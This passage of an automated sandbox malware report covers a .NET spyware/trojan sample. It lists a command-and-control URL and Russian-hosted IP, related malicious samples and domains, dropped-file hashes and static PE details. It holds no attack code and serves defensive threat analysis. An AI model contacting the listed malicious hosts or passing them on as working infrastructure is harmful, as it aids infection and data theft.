                    http://www.ibsensoftware.com/0%URL Reputationsafe
                    http://www.ibsensoftware.com/0%URL Reputationsafe
                    http://www.ibsensoftware.com/0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.fontbureau.comuec0%Avira URL Cloudsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.fontbureau.coma0%URL Reputationsafe
                    http://www.fontbureau.coma0%URL Reputationsafe
                    http://www.fontbureau.coma0%URL Reputationsafe
                    http://www.fontbureau.coma0%URL Reputationsafe
                    http://nevomw.com/candy/five/fre.php12%VirustotalBrowse
                    http://nevomw.com/candy/five/fre.php0%Avira URL Cloudsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.fontbureau.comai0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    nevomw.com
                    		45.144.3.234
                    		truetrueunknown
                    g.msn.com
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://nevomw.com/candy/five/fre.phptrue
                      • 12%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.comSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersGSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.comce9SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363372884.0000000001A07000.00000004.00000040.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers?SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                		high
                                http://www.ibsensoftware.com/SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.tiro.comSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.fontbureau.comuecSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363372884.0000000001A07000.00000004.00000040.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.goodfont.co.krSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.comaSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363372884.0000000001A07000.00000004.00000040.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.comlSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/cTheSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://fontfabrik.comSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cnSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/frere-jones.htmlSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.jiyu-kobo.co.jp/SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers8SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.fonts.comSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.sandoll.co.krSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.urwpp.deDPleaseSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.zhongyicts.com.cnSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363844302.0000000003341000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.sakkal.comSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.366875705.00000000062A0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comaiSecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363372884.0000000001A07000.00000004.00000040.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            45.144.3.234
                                            		unknownRussian Federation
                                            		51659ASBAXETRUtrue

                                            Private

                                            IP
                                            192.168.2.1

                                            General Information

                                            Joe Sandbox Version:31.0.0 Red Diamond
                                            Analysis ID:325825
                                            Start date:02.12.2020
                                            Start time:11:51:31
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 6m 53s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.20770 (renamed file extension from 20770 to exe)
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:17
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@3/3@247/2
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 17% (good quality ratio 16.3%)
                                            • Quality average: 77%
                                            • Quality standard deviation: 28.4%
                                            HCA Information:
                                            • Successful, ratio: 99%
                                            • Number of executed functions: 100
                                            • Number of non-executed functions: 10
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                            • Excluded IPs from analysis (whitelisted): 52.255.188.83, 40.88.32.150, 51.104.139.180, 52.155.217.156, 20.54.26.129, 2.20.142.210, 2.20.142.209, 51.103.5.159, 104.43.193.48, 52.142.114.176, 92.122.144.200
                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, wns.notify.windows.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, g-msn-com-nsatc.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            11:52:36API Interceptor260x Sleep call for process: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            45.144.3.234niteEnrgy.xlsxGet hashmaliciousBrowse
                                            • qreenmaple.com/baba/baba1/fre.php
                                            PI.xlsxGet hashmaliciousBrowse
                                            • nevomw.com/candy/five/fre.php
                                            6sgE9EFquRq5FpK.exeGet hashmaliciousBrowse
                                            • lmpulsefashion.net/bryt/bryt2/fre.php

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            nevomw.comPI.xlsxGet hashmaliciousBrowse
                                            • 45.144.3.234
                                            7HKZyhjCXK.exeGet hashmaliciousBrowse
                                            • 185.209.1.129
                                            UP8VQkNe42.exeGet hashmaliciousBrowse
                                            • 195.22.153.143
                                            ODnxDOTnzJ.exeGet hashmaliciousBrowse
                                            • 195.22.153.143
                                            BANK_TT_pdf.exeGet hashmaliciousBrowse
                                            • 185.209.1.109
                                            Pvm3Bq1eV0SeTcL.exeGet hashmaliciousBrowse
                                            • 195.22.153.143
                                            tt payment proof.xlsxGet hashmaliciousBrowse
                                            • 195.22.153.143
                                            5LWXhu3jRP.exeGet hashmaliciousBrowse
                                            • 185.209.1.109
                                            payslip.s.xlsxGet hashmaliciousBrowse
                                            • 185.204.2.232

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            ASBAXETRUhttp://redirectagrisrvcontact.comGet hashmaliciousBrowse
                                            • 185.22.155.63
                                            niteEnrgy.xlsxGet hashmaliciousBrowse
                                            • 45.144.2.145
                                            PI.xlsxGet hashmaliciousBrowse
                                            • 45.144.2.145
                                            6sgE9EFquRq5FpK.exeGet hashmaliciousBrowse
                                            • 45.144.3.234
                                            Doc.mhtGet hashmaliciousBrowse
                                            • 45.129.2.137
                                            3MndTUzGQn.exeGet hashmaliciousBrowse
                                            • 45.129.3.96
                                            installa.dllGet hashmaliciousBrowse
                                            • 45.140.168.107
                                            installa.dllGet hashmaliciousBrowse
                                            • 45.140.168.107
                                            https://voicenote.kimdirnet.com/screen.php?New_tWfgGGT____soppdYTW_____opUtyDheGWWeQiWJDD___fhfhKLHJSfCxsD=spetruk@cgsinc.com&fCCjdhRWyryCCSXW____fjfhDFHHFhsh=SFI7SW1wLiAjOTQ5NTMgUHJvZC5wZGY=Get hashmaliciousBrowse
                                            • 45.140.169.3
                                            Previdenza_Sociale.jarGet hashmaliciousBrowse
                                            • 45.135.135.99
                                            Previdenza_Sociale.jarGet hashmaliciousBrowse
                                            • 45.135.135.99
                                            SUPPLY-UtFpocnhm1uZ240 - docx.exeGet hashmaliciousBrowse
                                            • 46.29.161.122
                                            https://redspark.a2hosted.com/02565.pngGet hashmaliciousBrowse
                                            • 185.22.155.63
                                            http://176.32.33.145Get hashmaliciousBrowse
                                            • 176.32.33.145
                                            Glanzmann.docGet hashmaliciousBrowse
                                            • 176.32.33.145
                                            Glanzmann.docGet hashmaliciousBrowse
                                            • 176.32.33.145
                                            Glanzmann.docGet hashmaliciousBrowse
                                            • 176.32.33.145
                                            information.docGet hashmaliciousBrowse
                                            • 46.29.164.179
                                            information.docGet hashmaliciousBrowse
                                            • 46.29.164.179
                                            information.docGet hashmaliciousBrowse
                                            • 46.29.164.179

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.log
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1301
                                            Entropy (8bit):5.345637324625647
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4VE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz5
                                            MD5:6C42AAF2F2FABAD2BAB70543AE48CEDB
                                            SHA1:8552031F83C078FE1C035191A32BA43261A63DA9
                                            SHA-256:51D07DD061EA9665DA070B95A4AC2AC17E20524E30BF6A0DA8381C2AF29CA967
                                            SHA-512:014E89857B811765EA7AA0B030AB04A2DA1957571608C4512EC7662F6A4DCE8B0409626624DABC96CBFF079E7F0F4A916E6F49C789E00B6E46AD37C36C806DCA
                                            Malicious:true
                                            Reputation:moderate, very likely benign file
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                            C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            File Type:very short file (no magic)
                                            Category:dropped
                                            Size (bytes):1
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3:U:U
                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview: 1
                                            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\21c8026919fd094ab07ec3c180a9f210_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):47873
                                            Entropy (8bit):0.7460804838839109
                                            Encrypted:false
                                            SSDEEP:48:399999999999999999999999999999999999999999999999999999999999999b:7
                                            MD5:C596D8424366782AFBB9AC2600358887
                                            SHA1:A736CBB9372AB1DC21F8BF495EE9EE37898A704F
                                            SHA-256:158975CC68CFE4BCF5AF3FE1366250CFBA502A87315A4DC623B47CC56FCFF38C
                                            SHA-512:EF54E22A010CC553A94E94FD7D67FF82C439AEF6101EF86DC3F7C2AE148E19DEF18CD0BEC4AAC81982F3E9D444A6CD973988FCDA842EBB0DB4159833907A5102
                                            Malicious:false
                                            Reputation:low
                                            Preview: ........................................user..........................................................................................user..........................................................................................user..........................................................................................user..........................................................................................user..........................................................................................user..........................................................................................user..........................................................................................user..........................................................................................user..........................................................................................user......................................................................

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.850143173412625
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Windows Screen Saver (13104/52) 0.07%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            File name:SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            File size:667648
                                            MD5:2aaa15e28835feda9a2e223d82db2126
                                            SHA1:2c4ace288456010a2717597b192827cd9f7ec771
                                            SHA256:e385b8f5946a41469f49fad4aaeb98e510e79afd0ba6c8546c7b6548da61b8e6
                                            SHA512:3d17642e4e6afdbe84e15b962dd008c0b0a916f70020dc9125cbe2bdea86a316bb7dc99c59b96b88dfac2a5bc8d33b400ad0ec7bc514557a3798d5361b198908
                                            SSDEEP:12288:KF5znqopcqsY9N/uJkAbmKaLDpMiGFE/XahZSlQP/P9Ji8L:ahpcxLbm7DZLa/Sqv93L
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..&..........rD... ...`....@.. ....................................@................................

                                            File Icon

                                            Icon Hash:00828e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x4a4472
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0xC1FEB99E [Sun Feb 19 02:19:10 2073 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa44200x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xa60000x5c4.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xa80000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xa44040x1c.text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
